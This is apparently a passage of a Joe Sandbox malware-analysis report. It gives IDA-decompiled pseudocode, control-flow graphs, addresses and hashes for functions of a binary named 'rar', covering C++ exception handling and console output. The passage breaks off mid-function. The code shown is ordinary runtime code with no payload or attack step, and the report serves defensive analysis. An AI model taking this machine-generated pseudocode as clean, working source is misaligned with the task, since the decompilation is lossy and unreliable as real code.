                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1355 7ff650b6cecc-7ff650b6cf2f call 7ff650b6ca38 1358 7ff650b6cf48-7ff650b6cf51 call 7ff650b6c8f0 1355->1358 1359 7ff650b6cf31-7ff650b6cf3a call 7ff650b6c8f0 1355->1359 1364 7ff650b6cf67-7ff650b6cf6a 1358->1364 1365 7ff650b6cf53-7ff650b6cf60 call 7ff650b6c8f0 * 2 1358->1365 1366 7ff650b6cf40-7ff650b6cf46 1359->1366 1367 7ff650b6d3c1-7ff650b6d3c7 call 7ff650b7489c 1359->1367 1364->1367 1369 7ff650b6cf70-7ff650b6cf7c 1364->1369 1365->1364 1366->1364 1372 7ff650b6cfa7 1369->1372 1373 7ff650b6cf7e-7ff650b6cfa5 1369->1373 1376 7ff650b6cfa9-7ff650b6cfab 1372->1376 1373->1376 1376->1367 1378 7ff650b6cfb1-7ff650b6cfb7 1376->1378 1379 7ff650b6cfbd-7ff650b6cfc1 1378->1379 1380 7ff650b6d081-7ff650b6d097 call 7ff650b6dc4c 1378->1380 1379->1380 1382 7ff650b6cfc7-7ff650b6cfd2 1379->1382 1385 7ff650b6d09d-7ff650b6d0a1 1380->1385 1386 7ff650b6d317-7ff650b6d31b 1380->1386 1382->1380 1384 7ff650b6cfd8-7ff650b6cfdd 1382->1384 1384->1380 1387 7ff650b6cfe3-7ff650b6cfed call 7ff650b6c8f0 1384->1387 1385->1386 1390 7ff650b6d0a7-7ff650b6d0b2 1385->1390 1388 7ff650b6d31d-7ff650b6d324 1386->1388 1389 7ff650b6d353-7ff650b6d35d call 7ff650b6c8f0 1386->1389 1398 7ff650b6cff3-7ff650b6d019 call 7ff650b6c8f0 * 2 call 7ff650b6b900 1387->1398 1399 7ff650b6d35f-7ff650b6d37e call 7ff650b69d10 1387->1399 1388->1367 1393 7ff650b6d32a-7ff650b6d34e call 7ff650b6d3c8 1388->1393 1389->1367 1389->1399 1390->1386 1395 7ff650b6d0b8-7ff650b6d0bc 1390->1395 1393->1389 1396 7ff650b6d2fc-7ff650b6d300 1395->1396 1397 7ff650b6d0c2-7ff650b6d0f9 call 7ff650b6b3e0 1395->1397 1396->1389 1405 7ff650b6d302-7ff650b6d30f call 7ff650b6b380 1396->1405 1397->1396 1411 7ff650b6d0ff-7ff650b6d10a 1397->1411 1425 7ff650b6d01b-7ff650b6d01f 1398->1425 1426 7ff650b6d039-7ff650b6d043 call 7ff650b6c8f0 1398->1426 1413 7ff650b6d3a9-7ff650b6d3c0 call 7ff650b6c8f0 * 2 call 7ff650b7360c 1405->1413 1414 7ff650b6d315 1405->1414 1415 7ff650b6d10e-7ff650b6d11e 1411->1415 1413->1367 1414->1389 1417 7ff650b6d257-7ff650b6d2f6 1415->1417 1418 7ff650b6d124-7ff650b6d12a 1415->1418 1417->1396 1417->1415 1418->1417 1421 7ff650b6d130-7ff650b6d159 call 7ff650b6dbd0 1418->1421 1421->1417 1432 7ff650b6d15f-7ff650b6d1a6 call 7ff650b6b8d4 * 2 1421->1432 1425->1426 1429 7ff650b6d021-7ff650b6d02c 1425->1429 1426->1380 1438 7ff650b6d045-7ff650b6d065 call 7ff650b6c8f0 * 2 call 7ff650b6e518 1426->1438 1429->1426 1433 7ff650b6d02e-7ff650b6d033 1429->1433 1446 7ff650b6d1a8-7ff650b6d1cd call 7ff650b6b8d4 call 7ff650b6d7f8 1432->1446 1447 7ff650b6d1e2-7ff650b6d1f8 call 7ff650b6dfd0 1432->1447 1433->1367 1433->1426 1455 7ff650b6d07c 1438->1455 1456 7ff650b6d067-7ff650b6d071 call 7ff650b6e608 1438->1456 1461 7ff650b6d1ff-7ff650b6d24e call 7ff650b6cdf8 1446->1461 1462 7ff650b6d1cf-7ff650b6d1db 1446->1462 1457 7ff650b6d1fa 1447->1457 1458 7ff650b6d253 1447->1458 1455->1380 1465 7ff650b6d077-7ff650b6d3a2 call 7ff650b6aea0 call 7ff650b6dd60 call 7ff650b6b168 1456->1465 1466 7ff650b6d3a3-7ff650b6d3a8 call 7ff650b7360c 1456->1466 1457->1432 1458->1417 1461->1458 1462->1446 1464 7ff650b6d1dd 1462->1464 1464->1447 1465->1466 1466->1413
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B6CECC(void* __ebp, void* __eflags, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t157;
				intOrPtr _t158;
				intOrPtr _t160;
				void* _t179;
				intOrPtr _t194;
				intOrPtr _t199;
				void* _t200;
				signed long long _t240;
				signed long long _t241;
				signed char _t242;
				intOrPtr* _t244;
				long long _t246;
				long long _t254;
				intOrPtr* _t256;
				signed char* _t258;
				intOrPtr* _t270;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				signed long long _t295;
				long long _t304;
				long long _t305;
				intOrPtr* _t306;
				long long _t314;
				signed char* _t317;
				intOrPtr _t322;

				_t293 = _t294 - 0x88;
				_t295 = _t294 - 0x188;
				_t240 =  *0x50b978f0; // 0x27db226282f1
				_t241 = _t240 ^ _t295;
				 *(_t293 + 0x70) = _t241;
				_t317 =  *((intOrPtr*)(_t293 + 0xf0));
				 *((long long*)(_t295 + 0x78)) = __rdx;
				_t258 = _t317;
				 *((long long*)(_t293 - 0x60)) =  *((intOrPtr*)(_t293 + 0x108));
				_t292 = __r9;
				 *((char*)(_t295 + 0x60)) = 0;
				E00007FF67FF650B6CA38(__ebp, __rcx, _t258, __r9, _t291, __r9, _t293);
				if ( *((intOrPtr*)(_t292 + 0x48)) == 0) goto 0x50b6cf48;
				E00007FF67FF650B6C8F0(_t241);
				if ( *((intOrPtr*)(_t241 + 0x78)) != 0xfffffffe) goto 0x50b6d3c1;
				goto 0x50b6cf67;
				E00007FF67FF650B6C8F0(_t241);
				if ( *((intOrPtr*)(_t241 + 0x78)) == 0xfffffffe) goto 0x50b6cf67;
				E00007FF67FF650B6C8F0(_t241);
				_t199 =  *((intOrPtr*)(_t241 + 0x78));
				E00007FF67FF650B6C8F0(_t241);
				 *((intOrPtr*)(_t241 + 0x78)) = 0xfffffffe;
				if (_t199 - 0xffffffff < 0) goto 0x50b6d3c1;
				if (_t317[8] == 0) goto 0x50b6cfa7;
				_t242 = _t258[0x7ff650b85e20];
				goto 0x50b6cfa9;
				if (_t199 >= 0) goto 0x50b6d3c1;
				if ( *__rcx != 0xe06d7363) goto 0x50b6d081;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x50b6d081;
				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x50b6d081;
				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x50b6d081;
				E00007FF67FF650B6C8F0(_t242);
				if ( *((long long*)(_t242 + 0x20)) == 0) goto 0x50b6d35f;
				E00007FF67FF650B6C8F0(_t242);
				_t256 =  *((intOrPtr*)(_t242 + 0x20));
				E00007FF67FF650B6C8F0(_t242);
				 *((char*)(_t295 + 0x60)) = 1;
				E00007FF67FF650B6B900(_t242,  *((intOrPtr*)(_t256 + 0x38)));
				if ( *_t256 != 0xe06d7363) goto 0x50b6d039;
				if ( *((intOrPtr*)(_t256 + 0x18)) != 4) goto 0x50b6d039;
				if ( *((intOrPtr*)(_t256 + 0x20)) - 0x19930520 - 2 > 0) goto 0x50b6d039;
				if ( *((long long*)(_t256 + 0x30)) == 0) goto 0x50b6d3c1;
				E00007FF67FF650B6C8F0(_t242);
				if ( *(_t242 + 0x38) == 0) goto 0x50b6d081;
				E00007FF67FF650B6C8F0(_t242);
				E00007FF67FF650B6C8F0(_t242);
				 *(_t242 + 0x38) =  *(_t242 + 0x38) & 0x00000000;
				if (E00007FF67FF650B6E518(_t242, _t256, _t256,  *(_t242 + 0x38), _t292) != 0) goto 0x50b6d07c;
				if (E00007FF67FF650B6E608(_t242, _t256,  *(_t242 + 0x38), _t292, _t293) == 0) goto 0x50b6d3a3;
				goto 0x50b6d37f;
				E00007FF67FF650B6DC4C(_t293 - 0x10, _t317,  *((intOrPtr*)(_t292 + 8)));
				if ( *_t256 != 0xe06d7363) goto 0x50b6d317;
				if ( *((intOrPtr*)(_t256 + 0x18)) != 4) goto 0x50b6d317;
				if ( *((intOrPtr*)(_t256 + 0x20)) - 0x19930520 - 2 > 0) goto 0x50b6d317;
				if ( *((intOrPtr*)(_t293 - 0x10)) <= 0) goto 0x50b6d2fc;
				 *((intOrPtr*)(_t295 + 0x28)) =  *((intOrPtr*)(_t293 + 0x100));
				 *(_t295 + 0x20) = _t317;
				r8d = _t199;
				_t157 = E00007FF67FF650B6B3E0(_t256, _t293 - 0x58, _t293 - 0x10, _t291, _t292, _t293);
				asm("movups xmm0, [ebp-0x58]");
				asm("movdqu [ebp-0x78], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t157 -  *((intOrPtr*)(_t293 - 0x40)) >= 0) goto 0x50b6d2fc;
				_t158 =  *((intOrPtr*)(_t293 - 0x70));
				 *((long long*)(_t293 - 0x80)) =  *((intOrPtr*)(_t293 - 0x58));
				 *((intOrPtr*)(_t295 + 0x68)) = _t158;
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x78], xmm0");
				if (_t158 - _t199 > 0) goto 0x50b6d257;
				if (_t199 - _t158 > 0) goto 0x50b6d257;
				_t244 =  *((intOrPtr*)(_t292 + 0x10));
				r9d =  *_t244;
				E00007FF67FF650B6DBD0(_t244, _t293 + 0x20, _t293 - 0x78,  *((intOrPtr*)(_t292 + 8)));
				_t160 =  *((intOrPtr*)(_t293 + 0x20));
				r12d = 0;
				 *((intOrPtr*)(_t295 + 0x64)) = r12d;
				 *((intOrPtr*)(_t295 + 0x6c)) = _t160;
				if (_t160 == 0) goto 0x50b6d257;
				asm("movups xmm0, [ebp+0x38]");
				asm("movups xmm1, [ebp+0x48]");
				asm("movups [ebp-0x38], xmm0");
				asm("movsd xmm0, [ebp+0x58]");
				asm("movsd [ebp-0x18], xmm0");
				asm("movups [ebp-0x28], xmm1");
				E00007FF67FF650B6B8D4(_t244);
				_t246 = _t244 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0xc));
				 *((long long*)(_t295 + 0x70)) = _t246;
				E00007FF67FF650B6B8D4(_t246);
				r15d =  *((intOrPtr*)(_t246 +  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x30)) + 0xc))));
				if (r15d <= 0) goto 0x50b6d1e2;
				E00007FF67FF650B6B8D4(_t246);
				_t314 = _t246 +  *((intOrPtr*)( *((intOrPtr*)(_t295 + 0x70))));
				if (E00007FF67FF650B6D7F8(_t200, _t256, _t293 - 0x38, _t314, _t291, _t292,  *((intOrPtr*)(_t256 + 0x30))) != 0) goto 0x50b6d1ff;
				 *((long long*)(_t295 + 0x70)) =  *((long long*)(_t295 + 0x70)) + 4;
				r15d = r15d - 1;
				if (r15d > 0) goto 0x50b6d1a8;
				r12d =  *((intOrPtr*)(_t295 + 0x64));
				E00007FF67FF650B6DFD0( *((intOrPtr*)(_t295 + 0x70)), _t293 + 0x20);
				r12d = r12d + 1;
				 *((intOrPtr*)(_t295 + 0x64)) = r12d;
				if (r12d ==  *((intOrPtr*)(_t295 + 0x6c))) goto 0x50b6d253;
				goto 0x50b6d15f;
				 *((char*)(_t295 + 0x58)) =  *((intOrPtr*)(_t293 + 0xf8));
				_t270 = _t256;
				 *((char*)(_t295 + 0x50)) =  *((intOrPtr*)(_t295 + 0x60));
				 *((long long*)(_t295 + 0x48)) =  *((intOrPtr*)(_t293 - 0x60));
				 *((intOrPtr*)(_t295 + 0x40)) =  *((intOrPtr*)(_t293 + 0x100));
				 *((long long*)(_t295 + 0x38)) = _t293 - 0x78;
				 *((long long*)(_t295 + 0x30)) = _t314;
				 *((long long*)(_t295 + 0x28)) = _t293 - 0x38;
				 *(_t295 + 0x20) = _t317;
				E00007FF67FF650B6CDF8(_t258[0x7ff650b85e30], _t256, _t270,  *((intOrPtr*)(_t295 + 0x78)),  *((intOrPtr*)(_t242 + 0x28)), _t292); // executed
				_t322 =  *((intOrPtr*)(_t293 - 0x80));
				_t304 =  *((intOrPtr*)(_t322 + 8)) -  *((char*)(_t270 + 0x7ff650b85e20));
				 *((long long*)(_t322 + 8)) = _t304;
				 *(_t322 + 0x18) =  *(_t304 - 4) >>  *(_t270 + 0x7ff650b85e30);
				_t305 = _t304 -  *((char*)(_t270 + 0x7ff650b85e20));
				 *((long long*)(_t322 + 8)) = _t305;
				 *(_t322 + 0x1c) =  *(_t305 - 4) >>  *(_t270 + 0x7ff650b85e30);
				_t306 = _t305 -  *((char*)(_t270 + 0x7ff650b85e20));
				 *(_t322 + 0x20) =  *(_t306 - 4) >>  *(_t270 + 0x7ff650b85e30);
				_t194 =  *((intOrPtr*)(_t295 + 0x68)) + 1;
				 *((long long*)(_t322 + 8)) = _t306;
				_t116 = _t306 + 4; // 0x4
				_t254 = _t116;
				 *((long long*)(_t322 + 8)) = _t254;
				 *((intOrPtr*)(_t322 + 0x24)) =  *_t306;
				 *((intOrPtr*)(_t295 + 0x68)) = _t194;
				if (_t194 -  *((intOrPtr*)(_t293 - 0x40)) < 0) goto 0x50b6d10e;
				if (( *_t317 & 0x00000040) == 0) goto 0x50b6d353;
				if (E00007FF67FF650B6B380(_t317) == 0) goto 0x50b6d3a9;
				goto 0x50b6d353;
				if ( *((intOrPtr*)(_t293 - 0x10)) <= 0) goto 0x50b6d353;
				if ( *((char*)(_t293 + 0xf8)) != 0) goto 0x50b6d3c1;
				 *((long long*)(_t295 + 0x38)) = _t314;
				 *((intOrPtr*)(_t295 + 0x30)) =  *((intOrPtr*)(_t293 + 0x100));
				 *((intOrPtr*)(_t295 + 0x28)) = _t199;
				 *(_t295 + 0x20) = _t317;
				E00007FF67FF650B6D3C8( *_t306, _t256, _t322,  *((intOrPtr*)(_t242 + 0x28)), _t292);
				_t179 = E00007FF67FF650B6C8F0(_t254);
				if ( *((long long*)(_t254 + 0x38)) != 0) goto 0x50b6d3c1;
				return E00007FF67FF650B69D10(_t179, _t194,  *(_t293 + 0x70) ^ _t295);
			}


































                                                                                                            0x7ff650b6ced9
                                                                                                            0x7ff650b6cee1
                                                                                                            0x7ff650b6cee8
                                                                                                            0x7ff650b6ceef
                                                                                                            0x7ff650b6cef2
                                                                                                            0x7ff650b6cef6
                                                                                                            0x7ff650b6cf0a
                                                                                                            0x7ff650b6cf0f
                                                                                                            0x7ff650b6cf15
                                                                                                            0x7ff650b6cf19
                                                                                                            0x7ff650b6cf1c
                                                                                                            0x7ff650b6cf24
                                                                                                            0x7ff650b6cf2f
                                                                                                            0x7ff650b6cf31
                                                                                                            0x7ff650b6cf3a
                                                                                                            0x7ff650b6cf46
                                                                                                            0x7ff650b6cf48
                                                                                                            0x7ff650b6cf51
                                                                                                            0x7ff650b6cf53
                                                                                                            0x7ff650b6cf58
                                                                                                            0x7ff650b6cf5b
                                                                                                            0x7ff650b6cf60
                                                                                                            0x7ff650b6cf6a
                                                                                                            0x7ff650b6cf7c
                                                                                                            0x7ff650b6cf8c
                                                                                                            0x7ff650b6cfa5
                                                                                                            0x7ff650b6cfab
                                                                                                            0x7ff650b6cfb7
                                                                                                            0x7ff650b6cfc1
                                                                                                            0x7ff650b6cfd2
                                                                                                            0x7ff650b6cfdd
                                                                                                            0x7ff650b6cfe3
                                                                                                            0x7ff650b6cfed
                                                                                                            0x7ff650b6cff3
                                                                                                            0x7ff650b6cff8
                                                                                                            0x7ff650b6cffc
                                                                                                            0x7ff650b6d005
                                                                                                            0x7ff650b6d00e
                                                                                                            0x7ff650b6d019
                                                                                                            0x7ff650b6d01f
                                                                                                            0x7ff650b6d02c
                                                                                                            0x7ff650b6d033
                                                                                                            0x7ff650b6d039
                                                                                                            0x7ff650b6d043
                                                                                                            0x7ff650b6d045
                                                                                                            0x7ff650b6d04e
                                                                                                            0x7ff650b6d059
                                                                                                            0x7ff650b6d065
                                                                                                            0x7ff650b6d071
                                                                                                            0x7ff650b6d077
                                                                                                            0x7ff650b6d08c
                                                                                                            0x7ff650b6d097
                                                                                                            0x7ff650b6d0a1
                                                                                                            0x7ff650b6d0b2
                                                                                                            0x7ff650b6d0bc
                                                                                                            0x7ff650b6d0cc
                                                                                                            0x7ff650b6d0d7
                                                                                                            0x7ff650b6d0dc
                                                                                                            0x7ff650b6d0df
                                                                                                            0x7ff650b6d0e4
                                                                                                            0x7ff650b6d0e8
                                                                                                            0x7ff650b6d0ed
                                                                                                            0x7ff650b6d0f2
                                                                                                            0x7ff650b6d0f9
                                                                                                            0x7ff650b6d103
                                                                                                            0x7ff650b6d106
                                                                                                            0x7ff650b6d10a
                                                                                                            0x7ff650b6d10e
                                                                                                            0x7ff650b6d113
                                                                                                            0x7ff650b6d118
                                                                                                            0x7ff650b6d11e
                                                                                                            0x7ff650b6d12a
                                                                                                            0x7ff650b6d130
                                                                                                            0x7ff650b6d140
                                                                                                            0x7ff650b6d143
                                                                                                            0x7ff650b6d148
                                                                                                            0x7ff650b6d14b
                                                                                                            0x7ff650b6d14e
                                                                                                            0x7ff650b6d153
                                                                                                            0x7ff650b6d159
                                                                                                            0x7ff650b6d15f
                                                                                                            0x7ff650b6d163
                                                                                                            0x7ff650b6d167
                                                                                                            0x7ff650b6d16b
                                                                                                            0x7ff650b6d170
                                                                                                            0x7ff650b6d175
                                                                                                            0x7ff650b6d179
                                                                                                            0x7ff650b6d18a
                                                                                                            0x7ff650b6d18d
                                                                                                            0x7ff650b6d192
                                                                                                            0x7ff650b6d19f
                                                                                                            0x7ff650b6d1a6
                                                                                                            0x7ff650b6d1a8
                                                                                                            0x7ff650b6d1bc
                                                                                                            0x7ff650b6d1cd
                                                                                                            0x7ff650b6d1cf
                                                                                                            0x7ff650b6d1d5
                                                                                                            0x7ff650b6d1db
                                                                                                            0x7ff650b6d1dd
                                                                                                            0x7ff650b6d1e6
                                                                                                            0x7ff650b6d1eb
                                                                                                            0x7ff650b6d1ee
                                                                                                            0x7ff650b6d1f8
                                                                                                            0x7ff650b6d1fa
                                                                                                            0x7ff650b6d210
                                                                                                            0x7ff650b6d214
                                                                                                            0x7ff650b6d21b
                                                                                                            0x7ff650b6d223
                                                                                                            0x7ff650b6d22e
                                                                                                            0x7ff650b6d236
                                                                                                            0x7ff650b6d23f
                                                                                                            0x7ff650b6d244
                                                                                                            0x7ff650b6d249
                                                                                                            0x7ff650b6d24e
                                                                                                            0x7ff650b6d253
                                                                                                            0x7ff650b6d279
                                                                                                            0x7ff650b6d282
                                                                                                            0x7ff650b6d286
                                                                                                            0x7ff650b6d2a1
                                                                                                            0x7ff650b6d2aa
                                                                                                            0x7ff650b6d2ae
                                                                                                            0x7ff650b6d2c9
                                                                                                            0x7ff650b6d2d6
                                                                                                            0x7ff650b6d2da
                                                                                                            0x7ff650b6d2dc
                                                                                                            0x7ff650b6d2e0
                                                                                                            0x7ff650b6d2e0
                                                                                                            0x7ff650b6d2e7
                                                                                                            0x7ff650b6d2eb
                                                                                                            0x7ff650b6d2ef
                                                                                                            0x7ff650b6d2f6
                                                                                                            0x7ff650b6d300
                                                                                                            0x7ff650b6d30f
                                                                                                            0x7ff650b6d315
                                                                                                            0x7ff650b6d31b
                                                                                                            0x7ff650b6d324
                                                                                                            0x7ff650b6d333
                                                                                                            0x7ff650b6d33b
                                                                                                            0x7ff650b6d342
                                                                                                            0x7ff650b6d349
                                                                                                            0x7ff650b6d34e
                                                                                                            0x7ff650b6d353
                                                                                                            0x7ff650b6d35d
                                                                                                            0x7ff650b6d37e

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                            • String ID: csm$csm$csm
                                                                                                            • API String ID: 2940173790-393685449
                                                                                                            • Opcode ID: fb233ba4225619e86166de2345e602b32b65d8e2a624dabaaeb4eeccb07816a5
                                                                                                            • Instruction ID: a1bdd1d2f83a930bfce8bca352479c0e2cbcf2bead0a1b557bced3415a741628
                                                                                                            • Opcode Fuzzy Hash: fb233ba4225619e86166de2345e602b32b65d8e2a624dabaaeb4eeccb07816a5
                                                                                                            • Instruction Fuzzy Hash: 9FE1AF72E08B939AE7209F25D4C02BD37A0FB46788F184135DA9EA7796CF39E585C701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2803C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E00007FF67FF650B2803C(void* __rcx, intOrPtr* __rdx, signed int __r8) {
				signed int _v56;
				char _v2104;
				void* _v2116;
				void* _v2120;
				void* _v2128;
				long long _v2136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t33;
				int _t38;
				void* _t40;
				signed int _t45;
				void* _t50;
				void* _t55;
				void* _t57;
				signed long long _t66;
				void* _t69;
				signed long long _t95;
				void* _t96;
				signed long long _t102;
				signed long long _t104;
				void* _t111;
				void* _t112;
				long long _t113;

				_t66 =  *0x50b978f0; // 0x27db226282f1
				_v56 = _t66 ^  &_v2128;
				_t69 = __rcx;
				r8d = 0x400;
				E00007FF67FF650B59F98(__rcx, __rdx,  &_v2104, __r8, _t95, _t96, __r8, _t111);
				E00007FF67FF650B72A80(1, __rdx);
				r14d = 0;
				if (_t69 != __rdx) goto 0x50b28095;
				_t55 =  *0x50b9996d - r14b; // 0x0
				if (_t55 != 0) goto 0x50b280b7;
				E00007FF67FF650B72A80(2, __rdx);
				if (_t69 != __rdx) goto 0x50b2817f;
				_t57 =  *0x50b9996e - r14b; // 0x0
				if (_t57 == 0) goto 0x50b2817f;
				E00007FF67FF650B72A80(1, __rdx);
				asm("sbb ecx, ecx");
				E00007FF67FF650B16574(GetStdHandle(??));
				_v2128 = __r8;
				_v2136 = _t113;
				r8d = 0x1800;
				E00007FF67FF650B71614(_t40, 0xfffffff6, _t50,  ~(_t69 - __rdx),  *__rdx, 0x50b9d180, _t95, __r8,  &_v2104);
				_t45 =  *0x50b99968; // 0x0
				if (_t45 != 3) goto 0x50b28121;
				if ( *((intOrPtr*)(0x50b9d180 + ((__r8 | 0xffffffff) + 1) * 2)) != r14w) goto 0x50b2810f;
				r8d = r8d + r8d;
				goto 0x50b2816a;
				_t102 = _t95;
				if (_t45 != 4) goto 0x50b2813d;
				E00007FF67FF650B5D414(0x50b9d180, 0x50ba0180, __rdx, _t102, _t112);
				goto 0x50b28142;
				E00007FF67FF650B5D390(_t40, 0x50ba0180, 0x50b9d180, 0x50ba0180, _t102);
				if (( *0x50b99968 & 0xfffffffd) != 0) goto 0x50b2815a;
				CharToOemA(??, ??);
				_t104 = (_t102 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(0x50ba0180 + _t104)) != r14b) goto 0x50b2815e;
				_v2136 = _t113;
				_t33 = WriteFile(??, ??, ??, ??, ??);
				goto 0x50b281e8;
				E00007FF67FF650B16574(_t33);
				_v2128 = 0x50b9d180;
				_v2136 = _t113;
				r8d = 0x1800;
				E00007FF67FF650B71614(_t40, _t45, _t50, 0x50ba0180,  *__rdx, 0x50b9d180, _t95, _t104,  &_v2104);
				E00007FF67FF650B72A80(2, __rdx);
				GetStdHandle(??);
				if ( *((intOrPtr*)(0x50b9d180 + ((_t104 | 0xffffffff) + 1) * 2)) != r14w) goto 0x50b281c8;
				_v2136 = _t113;
				_t38 = WriteConsoleW(??, ??, ??, ??, ??); // executed
				return E00007FF67FF650B69D10(_t38, (r14d & 0xffffff00 | 0x50ba0180 != __rdx) + 0xfffffff4, _v56 ^  &_v2128);
			}





























                                                                                                            0x7ff650b2804a
                                                                                                            0x7ff650b28054
                                                                                                            0x7ff650b28062
                                                                                                            0x7ff650b2806d
                                                                                                            0x7ff650b28073
                                                                                                            0x7ff650b2807f
                                                                                                            0x7ff650b28084
                                                                                                            0x7ff650b2808a
                                                                                                            0x7ff650b2808c
                                                                                                            0x7ff650b28093
                                                                                                            0x7ff650b2809c
                                                                                                            0x7ff650b280a4
                                                                                                            0x7ff650b280aa
                                                                                                            0x7ff650b280b1
                                                                                                            0x7ff650b280b9
                                                                                                            0x7ff650b280c4
                                                                                                            0x7ff650b280d2
                                                                                                            0x7ff650b280d7
                                                                                                            0x7ff650b280e6
                                                                                                            0x7ff650b280f2
                                                                                                            0x7ff650b280fb
                                                                                                            0x7ff650b28100
                                                                                                            0x7ff650b28109
                                                                                                            0x7ff650b28117
                                                                                                            0x7ff650b28119
                                                                                                            0x7ff650b2811f
                                                                                                            0x7ff650b2812e
                                                                                                            0x7ff650b28134
                                                                                                            0x7ff650b28136
                                                                                                            0x7ff650b2813b
                                                                                                            0x7ff650b2813d
                                                                                                            0x7ff650b2814c
                                                                                                            0x7ff650b28154
                                                                                                            0x7ff650b2815e
                                                                                                            0x7ff650b28165
                                                                                                            0x7ff650b2816f
                                                                                                            0x7ff650b28177
                                                                                                            0x7ff650b2817d
                                                                                                            0x7ff650b2817f
                                                                                                            0x7ff650b28184
                                                                                                            0x7ff650b28195
                                                                                                            0x7ff650b2819a
                                                                                                            0x7ff650b281a6
                                                                                                            0x7ff650b281ad
                                                                                                            0x7ff650b281be
                                                                                                            0x7ff650b281d0
                                                                                                            0x7ff650b281d7
                                                                                                            0x7ff650b281e2
                                                                                                            0x7ff650b28205

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                            • String ID: Program aborted
                                                                                                            • API String ID: 643171463-1465807754
                                                                                                            • Opcode ID: 0176bc2a3d7b212b6b137b6b64bef0be41cc2211e06e306b32607575c7576b5f
                                                                                                            • Instruction ID: c72aca613c3b98f09a954e31fe2b189b9b20274d6c6ea7ed0be0ff783034be25
                                                                                                            • Opcode Fuzzy Hash: 0176bc2a3d7b212b6b137b6b64bef0be41cc2211e06e306b32607575c7576b5f
                                                                                                            • Instruction Fuzzy Hash: 7341E721E0964762FA609B21E8902B96251AF5BBE0F0C0334ED6FB77E5DE3EE555C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B54318 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 48%
                                                                                                            			E00007FF67FF650B54318(void* __ecx, void* __rax, intOrPtr* __rcx, void* __rdx, void* __r8) {
				long _t26;
				signed long long _t48;
				void* _t76;
